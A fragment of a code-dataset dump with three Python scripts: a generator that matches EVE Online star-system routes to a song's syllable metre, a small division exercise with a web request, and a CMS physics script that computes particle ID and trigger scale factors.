\"DATA/metre/mother_pollyanna.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/warp_to_the_dance_floor.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/providence_skies.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/dumb_ways_to_die.csv\"\n#METRE_CSV_FILE_LOCATION = \"DATA/metre/chocobo.csv\"\nMETRE_CSV_FILE_LOCATION = \"DATA/metre/scratch_metre.csv\"\n\n## Location of graph CSV file.\nGRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_namedregions.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_theforge.csv\"\n#GRAPH_CSV_FILE_LOCATION = \"DATA/graph/system_connections_pronunciations_kimotoro.csv\"\n\n## Initial node settings\n### Name of first node (must be in graph).\nINITIAL_NODE = \"Djimame\"\n### Number of syllables of first node (must be in graph)\nINITIAL_NODE_SYLLABLES = 3\n### Initial score to start with.\nFIRST_JUMP_SCORE = float(1.00)\n\n## Route search settings\n### Max number of jump attempts (~)\nMAX_JUMPS = 1000000\n### How much to penalize encountering recently visited nodes.\nSHORTLOOP_PENALTY_FACTOR = float(0.30)\n### Defines how long in the past is \"recent\"\nSHORTLOOP_LENGTH = 4\n### How much to penalize having to backtrack while searching.\nBACKTRACK_PENALTY_FACTOR = float(0.90)\n### How much to penalize failing a jump forward to a candidate node.\nNO_JUMP_PENALTY_FACTOR = float(0.90)\n### How much to reward selecting a successful jump forward.\nNEW_JUMP_BONUS = float(1.05)\n### How much to reward selecting a node with many syllables.\nLONGNAME_BONUS_FACTOR = float(1.05)\n### Route score below which backtracking is required.\nBACKTRACK_THRESHOLD = float(0.10)\n### Initial score to assign latest entry in route score list.\nNEW_JUMP_SCORE = float(1.00)\n\n\n# Create graph with CSV file info\n#with open('DATA/system_connections_pronunciations.csv', 'r') as csvfile:\n#with open('DATA/system_connections_pronunciations_namedregions.csv', 'r') as csvfile:\n#with open('DATA/system_connections_pronunciations_theforge.csv', 'r') as csvfile:\nwith open(GRAPH_CSV_FILE_LOCATION, 'r') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n\n # Initialize sublists\n solar_system_name = []\n security_rating = []\n region = []\n constellation = []\n coord_x = []\n coord_z = []\n coord_y = []\n gate_1 = []\n gate_2 = []\n gate_3 = []\n gate_4 = []\n gate_5 = []\n gate_6 = []\n gate_7 = []\n gate_8 = []\n pron_1_sc = []\n pron_1 = []\n pron_2_sc = []\n pron_2 = []\n pron_3_sc = []\n pron_3 = []\n\n # Populate sublists\n for row in readCSV:\n solar_system_name_sub = row[0]\n security_rating_sub = row[1]\n region_sub = row[2]\n constellation_sub = row[3]\n coord_x_sub = row[4]\n coord_z_sub = row[5]\n coord_y_sub = row[6]\n gate_1_sub = row[7]\n gate_2_sub = row[8]\n gate_3_sub = row[9]\n gate_4_sub = row[10]\n gate_5_sub = row[11]\n gate_6_sub = row[12]\n gate_7_sub = row[13]\n gate_8_sub = row[14]\n pron_1_sc_sub = row[15]\n pron_1_sub = row[16]\n pron_2_sc_sub = row[17]\n pron_2_sub = row[18]\n pron_3_sc_sub = row[19]\n pron_3_sub = row[20]\n \n solar_system_name.append(solar_system_name_sub)\n security_rating.append(security_rating_sub)\n region.append(region_sub)\n constellation.append(constellation_sub)\n coord_x.append(coord_x_sub)\n coord_z.append(coord_z_sub)\n coord_y.append(coord_y_sub)\n gate_1.append(gate_1_sub)\n gate_2.append(gate_2_sub)\n gate_3.append(gate_3_sub)\n gate_4.append(gate_4_sub)\n gate_5.append(gate_5_sub)\n gate_6.append(gate_6_sub)\n gate_7.append(gate_7_sub)\n gate_8.append(gate_8_sub)\n pron_1_sc.append(pron_1_sc_sub)\n pron_1.append(pron_1_sub)\n pron_2_sc.append(pron_2_sc_sub)\n pron_2.append(pron_2_sub)\n pron_3_sc.append(pron_3_sc_sub)\n pron_3.append(pron_3_sub)\n\n solar_system_name.pop(0)\n security_rating.pop(0)\n region.pop(0)\n constellation.pop(0)\n coord_x.pop(0)\n coord_z.pop(0)\n coord_y.pop(0)\n gate_1.pop(0)\n gate_2.pop(0)\n gate_3.pop(0)\n gate_4.pop(0)\n gate_5.pop(0)\n gate_6.pop(0)\n gate_7.pop(0)\n gate_8.pop(0)\n pron_1_sc.pop(0)\n pron_1.pop(0)\n pron_2_sc.pop(0)\n pron_2.pop(0)\n pron_3_sc.pop(0)\n pron_3.pop(0)\n\n #convert list of string integers into list of strings\n #pron_1_sc = list(map(int, pron_1_sc))\n #pron_2_sc = list(map(int, pron_2_sc))\n #pron_3_sc = list(map(int, pron_3_sc))\n\n #convert list of string floats into list of floats\n #coord_x = list(map(float, coord_x))\n #coord_z = list(map(float, coord_z))\n #coord_y = list(map(float, coord_y))\n \n# Test print data in lists\n# print(solar_system_name)\n# print(security_rating)\n# print(region)\n# print(constellation)\n# print(coord_x)\n# print(coord_z)\n# print(coord_y)\n# print(gate_1)\n# print(gate_2)\n# print(gate_3)\n# print(gate_4)\n# print(gate_5)\n# print(gate_6)\n# print(gate_7)\n# print(gate_8)\n# print(pron_1_sc)\n# print(pron_1)\n# print(pron_2_sc)\n# print(pron_2)\n# print(pron_3_sc)\n# print(pron_3)\n\n# Create graph\nG=nx.Graph()\n\n\n# Add nodes\nG.add_nodes_from(solar_system_name)\n\n\n# Add edges\ncount = 0\nfor origin in solar_system_name:\n #print(count)\n if gate_1[count]:\n #print('Found element')\n #print(*[origin,gate_1[count]])\n G.add_edge(*[origin,gate_1[count]])\n #else:\n #print('Empty element')\n if gate_2[count]:\n #print('Found element')\n #print(*[origin,gate_2[count]])\n G.add_edge(*[origin,gate_2[count]])\n #else:\n #print('Empty element')\n if gate_3[count]:\n #print('Found element')\n #print(*[origin,gate_3[count]])\n G.add_edge(*[origin,gate_3[count]])\n #else:\n #print('Empty element')\n if gate_4[count]:\n #print('Found element')\n #print(*[origin,gate_4[count]]) \n G.add_edge(*[origin,gate_4[count]])\n #else:\n #print('Empty element')\n if gate_5[count]:\n #print('Found element')\n #print(*[origin,gate_5[count]])\n G.add_edge(*[origin,gate_5[count]])\n #else:\n #print('Empty element')\n if gate_6[count]:\n #print('Found element')\n #print(*[origin,gate_6[count]])\n G.add_edge(*[origin,gate_6[count]])\n #else:\n #print('Empty element')\n if gate_7[count]:\n #print('Found element')\n #print(*[origin,gate_7[count]])\n G.add_edge(*[origin,gate_7[count]])\n #else:\n #print('Empty element')\n if gate_8[count]:\n #print('Found element')\n #print(*[origin,gate_8[count]])\n G.add_edge(*[origin,gate_8[count]])\n #else:\n #print('Empty element')\n count += 1\n\n# List edges of graph\n#print(G.edges())\n\n# Draw (don't activate if plotting all of New Eden)\n#nx.draw(G, with_labels = True)\n#plt.show()\n\n#print(G.nodes())\n#print(G.edges())\n#print(list(G.adj['Jita']))\n\n\n# Import meter list from CSV file.\nwith open(METRE_CSV_FILE_LOCATION, 'r') as csvfile2:\n readMetreCSV = csv.reader(csvfile2, delimiter=',')\n metre_master = []\n for row in readMetreCSV:\n metre_master_sub = row[0]\n metre_master.append(metre_master_sub)\n metre_master.pop(0)\n metre_master = list(map(int, metre_master))\n metre = metre_master.copy() # Make working duplicate of metre_master\nprint('Master metre is:',metre_master)\n\n\n# Initialize route lists:\nscore = []\nscore.append(float(FIRST_JUMP_SCORE)) # initialize and set initial score\nroute = []\nroute.append(INITIAL_NODE) # initialize and set initial node\nroute_syllables = [INITIAL_NODE_SYLLABLES] # initialize route syllables list\nmetre[0] = metre[0] - INITIAL_NODE_SYLLABLES\nmetre_master_progress_index = 0 # initialize master metre list index\n#print(route)\n\n\n# Primary search loop\nfor jump in range (0, MAX_JUMPS):\n\n # Status calcs.\n adjacent_systems = list(G.adj[route[-1]])\n current_system = route[-1]\n current_system_index = solar_system_name.index(current_system)\n current_score = score[-1]\n remaining_metre = metre[0]\n adjacent_system_count = len(adjacent_systems)\n \n # Status report.\n #clear()\n print(\":: :: :: ::\")\n print(\"metre_master :\",metre_master)\n print(\"We are on jump :\",jump)\n print(\"Route list so far :\",route)\n print(\"metre list status :\",metre)\n print(\"score list status :\",[\"{0:0.15f}\".format(i) for i in score])\n print(\"syllable_list status:\",route_syllables)\n print(\"Current system: :\",current_system)\n print(\"Current sys index :\",current_system_index)\n print(\"Current score is :\",current_score)\n print(\"remaining_metre :\",remaining_metre)\n print(\"Adjacent systems :\",adjacent_systems)\n print(\"Adj. system count :\",adjacent_system_count)\n\n if remaining_metre == 0: # Check if next jump fully consumed remaining_metre\n print('remaining_metre = 0. Loading next metre element.')\n metre.pop(0) # Removes first element in metre list so next element will be loaded next loop.\n print('====METRE ELEMENT POPPED====')\n # Detect metre depletion.\n if not metre:\n print(\"========METRE DEPLETED========\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\"Master metre list :\", metre_master)\n print(\"Completed syllable list :\",route_syllables)\n print(\"Completed route list :\", route)\n print(\"Completed score list :\", [\"{0:0.3f}\".format(i) for i in score])\n print(\"Completed route jump count:\",len(route))\n print(\"Final metre list status:\", metre)\n print(\"Junp evaluation loops initiated:\",jump)\n print(\"Final lyrics:\")\n print([str(route[i])+' - '+str(route_syllables[i]) for i in range (len(route))])\n print(\":: :: :: :: :: :: :: :: ::\")\n print(\"Total systems in route:\",len(route))\n print(\":: :: :: :: :: :: :: :: ::\")\n sys.exit()\n else:\n remaining_metre = metre[0] # Load new first entry into remaining_metre variable.\n print('remaining_metre :',remaining_metre)\n metre_master_progress_index += 1 # Update current corresponding position in metre_master\n print('metre_master_progress_index updated to:',metre_master_progress_index)\n print('metre list status :',metre)\n\n \n # Select random system for next jump.\n nextRandJumpInvalid = True\n while nextRandJumpInvalid:\n #Select random system from adjacent_systems list\n nextRandJumpAdjacentIndex = systemRandom.randint(0,adjacent_system_count - 1)\n print(\"Next random jump Index:\",nextRandJumpAdjacentIndex)\n nextRandJumpName = adjacent_systems[nextRandJumpAdjacentIndex]\n print(\"Next random jump Name :\",nextRandJumpName)\n # Calculate index within solar_system_name that contains nextRandJumpName\n nextRandJumpSolarSystemIndex = solar_system_name.index(nextRandJumpName)\n if nextRandJumpName in solar_system_name and pron_1_sc[nextRandJumpSolarSystemIndex].isdigit():\n nextRandJumpInvalid = False\n print('Next jump is within loaded solar systems list. Exiting while loop.')\n else:\n nextRandJumpInvalid = True\n print('Next jump is not within loaded solar system list. Remaining in while loop to reroll.')\n \n # Identify syllable count for next jump\n #print('solar_system_name list:',solar_system_name)\n #print('pron_1_sc',pron_1_sc)\n #print('current_system_index:',nextRandJumpSolarSystemIndex)\n #print('int(pron_1_sc[nextRandJumpSolarSystemIndex]):',int(pron_1_sc[nextRandJumpSolarSystemIndex]))\n nextRandJumpSyllableCount = int(pron_1_sc[nextRandJumpSolarSystemIndex])\n print(\"Next random jump name syllable count:\",nextRandJumpSyllableCount)\n\n # Apply score penalties\n #Penalty if next jump system is already in last SHORTLOOP_LENGTH entries of route\n if nextRandJumpName in route[-int(SHORTLOOP_LENGTH):]:\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR\n #Penalty if next jump system is already in last 2*SHORTLOOP_LENGTH entries of route\n if nextRandJumpName in route[-int(2 * SHORTLOOP_LENGTH):]:\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR\n #Penalty for each occurence of a system within the SHORTLOOP_LENGTH\n if nextRandJumpName in route[-int(SHORTLOOP_LENGTH):]:\n nameOccurencesInShortLoop = route.count(nextRandJumpName)\n score[-1] = score[-1] * SHORTLOOP_PENALTY_FACTOR**(nameOccurencesInShortLoop/2)/2\n\n # Apply score bonuses\n #Apply bonus scaled to how many syllables name has\n score[-1] = score[-1] * LONGNAME_BONUS_FACTOR**(nextRandJumpSyllableCount - 1)\n \n # Subtract syllables from remaining metre\n remaining_metre = remaining_metre - nextRandJumpSyllableCount\n print(\"Updated remaining metre:\",remaining_metre)\n\n # If next jump syllable count does NOT cause remaining_metre to go\n # negative, then perform jump (update metre, route, score, and\n # route_syllable lists)\n # If next jump syllable count does cause remaining_metre to go\n # negative, then do NOT perform jump (do NOT update metre,\n # route, or route_syllable lists). Apply penalty to latest\n # element in score list.\n # Note: This will cause next loops to try different jumps until\n # the latest score list element falls below a threshhold.\n # If previous jump score is below BACKTRACK_THRESHOLD then backtrack:\n # 1. Increment remaining_metre by amount in latest\n # route_syllables list element, restoring metre list to\n # previous state\n # 2. Adding entry to front of metre list if remaining_metre\n # incremented above original metre element value (comparison\n # made against metre_master using\n # metre_master_progress_index as a reference.\n # 3. Remove latest entry in score list.\n # 4. Remove latest entry in score_syllables list.\n # 5. Remove latest entry in route list.\n # 6. Apply penalty to latest element in score list.\n if score[-1] < BACKTRACK_THRESHOLD: # Check if most recent score low enough to trigger backtracking.\n print('========SCORE VIOLATION========')\n print('Score violation occured. Backtracking.')\n metre[0] = metre[0] + route_syllables[-1]\n print('Backtracked new metre[0] value:',metre[0])\n print('metre_master:',metre_master)\n print('metre_master_progress_index:',metre_master_progress_index)\n print('metre_master[metre_master_progress_index]:',metre_master[metre_master_progress_index])\n # Handle case if backtrack rolls back over a meter boundary\n if metre[0] > metre_master[metre_master_progress_index]:\n # Save value to be stored in restored element to be shortly preappended to metre[]\n backtrack_metre_carryover = metre[0] - metre_master[metre_master_progress_index]\n # Restore first element in metre[] back to original value from metre_master\n metre[0] = metre_master[metre_master_progress_index]\n # Preappend carryover value to be new first element in metre[]\n metre.insert(0,backtrack_metre_carryover)\n # Decrement metre_master_progress by one.\n metre_master_progress_index -= 1\n score.pop() # Removing latest score list element. \n route_syllables.pop() # Remove latest route_syllables list element.\n route.pop() # Removing latest route list element.\n if not score:\n print('score list depleted. not applying penalty')\n print('score list:',score)\n print('route_syllable list:',route_syllables)\n print('route list:',route)\n else:\n score[-1] = score[-1] * BACKTRACK_PENALTY_FACTOR #Applying penalty to previous score element.\n print('BACKTRACK PENALTY applied to score. Score now:',score[-1])\n # Handle case if route list completely emptied\n if not route:\n # Start again but from random system\n # Select random system from solar_system_name\n# import pdb; pdb.set_trace()\n initialRandSystemIndexInvalid = True\n while initialRandSystemIndexInvalid:\n initialRandSystemIndex = systemRandom.randint(0,len(solar_system_name)-1)\n initialRandSystemName = solar_system_name[initialRandSystemIndex]\n if pron_1_sc[initialRandSystemIndex].isdigit():\n initialRandSystemIndexInvalid = False\n initialRandSystemSyllableCount = int(pron_1_sc[initialRandSystemIndex]) \n else:\n initialRandSystemIndexInvalid = True\n # Reinitialize:\n # 1. route list\n # 2. metre list\n # 3. route_syllable list\n # 4. score list\n route = []\n route.append(initialRandSystemName)\n metre = metre_master.copy()\n metre[0] = metre[0] - initialRandSystemSyllableCount\n route_syllables = [initialRandSystemSyllableCount]\n score = []\n score.append(float(FIRST_JUMP_SCORE))\n metre_master_progress_index = 0\n print('====ROUTE LIST DEPLETED, RESTARTING SEARCH FROM RANDOM NODE====')\n #time.sleep(.1)\n else:\n print('remaining_metre of prospective jump:',remaining_metre)\n if remaining_metre >= 0: # Check if some syllables still remain\n print('Some or no syllables remain. Updating last element of metre list.')\n metre[0] = remaining_metre # Set updated remaining_metre to first entry of metre list.\n score[-1] = score[-1] * NEW_JUMP_BONUS # Add bonus to node before jump\n score.append(NEW_JUMP_SCORE) # Add new element to end of score list\n route_syllables.append(nextRandJumpSyllableCount) # Add new element to end of route_syllable list\n route.append(nextRandJumpName) # Add new element to route list containing next rand jump.\n print('====JUMP SUCCESS : NEW JUMP BONUS APPLIED====')\n else: # What to do if remaining_metre < 0\n print('======METRE VIOLATION : NO JUMP PENALTY======')\n print('Metre violation occured. Jump cancelled.')\n print('No changes made to score, route, or route_syllables lists.')\n score[-1] = score[-1] * NO_JUMP_PENALTY_FACTOR # Applying penalty to previous score element.\n print('NO JUMP PENALTY applied to score. Score now:',score[-1])\n print(\":: :: :: ::\")\n print(\"\")\n print(\"\")\n\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint('====JUMPS DEPLETED, SEARCH FAILED====')\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\nprint(\":: :: :: :: :: :: :: :: ::\")\n\n \n \n \n","repo_name":"baltakatei/routesong","sub_path":"routesong.py","file_name":"routesong.py","file_ext":"py","file_size_in_byte":20310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5650921963","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 18 18:40:30 2019\n\n@author: Dell\n\"\"\"\nimport requests\na=int(input())\n\nb=int(input())\ntry:\n z = a/b\n print(z)\nexcept ZeroDivisionError:\n print(a)\nfinally:\n print(\"Write \")\nurl_my_404 ='www.ivgo180419.com'\nprint(requests.get(url_my_404))","repo_name":"goglevivan/AllLesson","sub_path":"trying.py","file_name":"trying.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18979296303","text":"import sys\nimport pickle\nimport array\nimport math\n\nimport ROOT\n\nphotonPtBins = array.array('d', [40., 50., 8000.])\nphotonEtaBins = array.array('d', [0., 0.8, 1.4442])\nelectronPtBins = array.array('d', [20., 30., 40., 50., 8000.])\nelectronEtaBins = array.array('d', [0., 0.8, 1.442, 1.556, 2., 2.5])\nmuonPtBins = array.array('d', [25., 30., 35., 40., 50., 60., 90., 140., 8000.])\nmuonEtaBins = array.array('d', [0., 0.9, 1.2, 2.1, 2.4])\n\nidSFOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/scalefactors.root', 'recreate')\n\nphoton = ROOT.TH2D('photon', 'Photon ID scale factor', len(photonPtBins) - 1, photonPtBins, len(photonEtaBins) - 1, photonEtaBins)\nelectron = ROOT.TH2D('electron', 'Electron ID scale factor', len(electronPtBins) - 1, electronPtBins, len(electronEtaBins) - 1, electronEtaBins)\nmuon = ROOT.TH2D('muon', 'Muon ID scale factor', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\nmuonData = ROOT.TH2D('muonData', 'Muon ID efficiency data', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\nmuonMC = ROOT.TH2D('muonMC', 'Muon ID efficiency MC', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\n\nphotonIDBaseSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/Photon_ID_CSEV_SF_Jan22rereco_Full2012_S10_MC_V01.root')\nphotonIDBase = photonIDBaseSource.Get('PhotonIDSF_LooseWP_Jan22rereco_Full2012_S10_MC_V01')\nphotonIDVetoSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/photonID/scaleFactorZmumug_pt.root')\nphotonIDVeto = photonIDVetoSource.Get('scale_nochnogsf_all')\n\nfor iP in range(photonIDVeto.GetN()):\n iX = photon.GetXaxis().FindFixBin(photonIDVeto.GetX()[iP])\n if iX == 0: continue\n if iX > photon.GetNbinsX(): break\n\n for iY in range(1, photon.GetNbinsY() + 1):\n bin = photon.GetBin(iX, iY)\n\n photon.SetBinContent(bin, photonIDVeto.GetY()[iP])\n photon.SetBinError(bin, photonIDVeto.GetErrorY(iP))\n\nfor iX in range(1, photon.GetNbinsX() + 1):\n sX = photonIDBase.GetXaxis().FindFixBin(photon.GetXaxis().GetBinLowEdge(iX))\n \n for iY in range(1, photon.GetNbinsY() + 1):\n sY = photonIDBase.GetYaxis().FindFixBin(photon.GetYaxis().GetBinCenter(iY))\n \n bin = photon.GetBin(iX, iY)\n sbin = photonIDBase.GetBin(sX, sY)\n\n sf = photon.GetBinContent(bin) * photonIDBase.GetBinContent(sbin)\n relErrVeto = photon.GetBinError(bin) / photon.GetBinContent(bin)\n relErrBase = photonIDBase.GetBinError(sbin) / photonIDBase.GetBinContent(sbin)\n\n photon.SetBinContent(bin, sf)\n photon.SetBinError(bin, sf * math.sqrt(relErrVeto * relErrVeto + relErrBase * relErrBase))\n\n\nphotonIDBaseSource.Close()\nphotonIDVetoSource.Close()\n\n#[20., 30., 40., 50., 8000.] x [0., 0.8, 1.442, 1.556, 2., 2.5]\nelectronSFs = [\n [(0.986, 0.002), (1.002, 0.001), (1.005, 0.001), (1.004, 0.001)],\n [(0.959, 0.003), (0.980, 0.001), (0.988, 0.001), (0.988, 0.002)],\n [(0.967, 0.007), (0.950, 0.007), (0.958, 0.005), (0.966, 0.009)],\n [(0.941, 0.005), (0.967, 0.003), (0.992, 0.002), (1.000, 0.003)],\n [(1.020, 0.003), (1.021, 0.003), (1.019, 0.002), (1.022, 0.004)]\n]\nelectronSFSystematics = [\n [1.40, 0.28, 0.14, 0.41],\n [1.40, 0.28, 0.14, 0.41],\n [5.70, 2.40, 0.28, 0.43],\n [2.20, 0.59, 0.30, 0.53],\n [2.20, 0.59, 0.30, 0.53]\n]\n\nfor iEta in range(len(electronSFs)):\n row = electronSFs[iEta]\n for iPt in range(len(row)):\n bin = electron.GetBin(iPt + 1, iEta + 1)\n sf, err = row[iPt]\n syst = electronSFSystematics[iEta][iPt] * 0.01\n electron.SetBinContent(bin, sf)\n electron.SetBinError(bin, math.sqrt(err * err + syst * syst))\n\nwith open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/MuonEfficiencies_Run2012ReReco_53X.pkl') as source:\n muonID = pickle.load(source)['Tight']\n\nwith open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/MuonEfficiencies_ISO_Run_2012ReReco_53X.pkl') as source:\n muonISO = pickle.load(source)['combRelIsoPF04dBeta<012_Tight']\n\nfor iPt in range(len(muonPtBins) - 1):\n if muonPtBins[iPt] < 140.:\n ptbinName = str(int(muonPtBins[iPt])) + '_' + str(int(muonPtBins[iPt + 1]))\n else:\n ptbinName = '140_300'\n\n for iEta in range(len(muonEtaBins) - 1):\n if muonEtaBins[iEta] < 0.5:\n etabinName = 'ptabseta<0.9'\n else:\n etabinName = 'ptabseta%.1f-%.1f' % (muonEtaBins[iEta], muonEtaBins[iEta + 1])\n\n idset = tuple([muonID[etabinName][ptbinName]['data/mc'][k] for k in ['efficiency_ratio', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['data/mc'][k] for k in ['efficiency_ratio', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muon.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muon.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) + math.pow(isoRelErr, 2.)))\n\n idset = tuple([muonID[etabinName][ptbinName]['data'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['data'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muonData.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muonData.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) + math.pow(isoRelErr, 2.)))\n\n idset = tuple([muonID[etabinName][ptbinName]['mc'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n isoset = tuple([muonISO[etabinName][ptbinName]['mc'][k] for k in ['efficiency', 'err_low', 'err_hi']])\n\n idRelErr = max(idset[1:]) / idset[0]\n isoRelErr = max(isoset[1:]) / isoset[0]\n\n muonMC.SetBinContent(iPt + 1, iEta + 1, idset[0] * isoset[0])\n muonMC.SetBinError(iPt + 1, iEta + 1, idset[0] * isoset[0] * math.sqrt(math.pow(idRelErr, 2.) + math.pow(isoRelErr, 2.)))\n\nidSFOutputFile.cd()\nidSFOutputFile.Write()\nidSFOutputFile.Close()\n\nsamples = ['WGToLNuG', 'ZGToLLG', 'TTGJets']\n\nfor sample in samples:\n effOutputFile = ROOT.TFile.Open('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/idEfficiency/' + sample + '.root', 'recreate')\n \n source = ROOT.TFile.Open('rooth://ncmu40//store/idEfficiency/' + sample + '.root')\n tree = source.Get('idTree')\n\n photon_eff = ROOT.TProfile2D('photon_eff', 'Photon ID efficiency', len(photonPtBins) - 1, photonPtBins, len(photonEtaBins) - 1, photonEtaBins)\n electron_eff = ROOT.TProfile2D('electron_eff', 'Electron ID efficiency', len(electronPtBins) - 1, electronPtBins, len(electronEtaBins) - 1, electronEtaBins)\n muon_eff = ROOT.TProfile2D('muon_eff', 'Muon ID efficiency', len(muonPtBins) - 1, muonPtBins, len(muonEtaBins) - 1, muonEtaBins)\n\n tree.Draw('recoId>0:TMath::Abs(eta):pt>>photon_eff', 'weight * (pdgId == 22 && genIso < 5.)', 'prof goff')\n tree.Draw('recoId>1:TMath::Abs(eta):pt>>electron_eff', 'weight * (TMath::Abs(pdgId) == 11)', 'prof goff')\n tree.Draw('recoId>1:TMath::Abs(eta):pt>>muon_eff', 'weight * (TMath::Abs(pdgId) == 13)', 'prof goff')\n\n photon_eff.SetDirectory(effOutputFile)\n electron_eff.SetDirectory(effOutputFile)\n muon_eff.SetDirectory(effOutputFile)\n\n source.Close()\n\n effOutputFile.cd()\n effOutputFile.Write()\n effOutputFile.Close()\n\n\nhltSFOutputFile = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/main/hltEfficiency/scalefactors.root', 'recreate')\n\nphotonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/photon/data.root')\nphotonDataL1 = photonDataSource.Get('SingleEG22_etaNVtx_eff')\nphotonDataHLT = photonDataSource.Get('Ph36IdIso_etaNVtx_eff')\n#photonDataL1 = photonDataSource.Get('SingleEG22_ptEta_eff')\n#photonDataHLT = photonDataSource.Get('Ph36IdIso_ptEta_eff')\n\nphotonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/photon/dye.root')\nphotonMCL1 = photonMCSource.Get('SingleEG22_etaNVtx_eff')\nphotonMCHLT = photonMCSource.Get('Ph36IdIso_etaNVtx_eff')\n#photonMCL1 = photonMCSource.Get('SingleEG22_ptEta_eff')\n#photonMCHLT = photonMCSource.Get('Ph36IdIso_ptEta_eff')\n\nhltSFOutputFile.cd()\nphoton_e = photonDataHLT.Clone('photon_e')\n\nfor iX in range(1, photon_e.GetNbinsX() + 1):\n for iY in range(1, photon_e.GetNbinsY() + 1):\n bin = photon_e.GetBin(iX, iY)\n\n sf = photonDataL1.GetBinContent(bin) * photonDataHLT.GetBinContent(bin) / photonMCL1.GetBinContent(bin) / photonMCHLT.GetBinContent(bin)\n relErr2 = 0.\n relErr = photonDataL1.GetBinError(bin) / photonDataL1.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonDataHLT.GetBinError(bin) / photonDataHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonMCL1.GetBinError(bin) / photonMCL1.GetBinContent(bin)\n relErr2 += relErr * relErr\n relErr = photonMCHLT.GetBinError(bin) / photonMCHLT.GetBinContent(bin)\n relErr2 += relErr * relErr\n\n photon_e.SetBinContent(bin, sf)\n photon_e.SetBinError(bin, sf * math.sqrt(relErr2))\n\nphotonDataSource.Close()\nphotonMCSource.Close()\n\nphotonDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_ph/data.root')\nphotonDataHLT = photonDataSource.Get('Ph22CaloIdL_inclusive_eff')\n\nphotonMCSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/mueg_ph/zg.root')\nphotonMCHLT = photonMCSource.Get('Ph22CaloIdL_inclusive_eff')\n\nhltSFOutputFile.cd()\nphoton_mu = photonDataHLT.Clone('photon_mu')\n\nsf = photonDataHLT.GetBinContent(1) / photonMCHLT.GetBinContent(1)\nrelErr2 = 0.\nrelErr = photonDataHLT.GetBinError(1) / photonDataHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\nrelErr = photonMCHLT.GetBinError(1) / photonMCHLT.GetBinContent(1)\nrelErr2 += relErr * relErr\n\nphoton_mu.SetBinContent(1, sf)\nphoton_mu.SetBinError(1, sf * math.sqrt(relErr2))\n\nphotonDataSource.Close()\nphotonMCSource.Close()\n\nelectronDataSource = ROOT.TFile('/afs/cern.ch/user/y/yiiyama/output/GammaL/triggers/electron/data.root')\nelectronDataHLT = electronDataSource.Get('Ph22IdIso_etaNVtx_eff')\n#electronDataHLT = 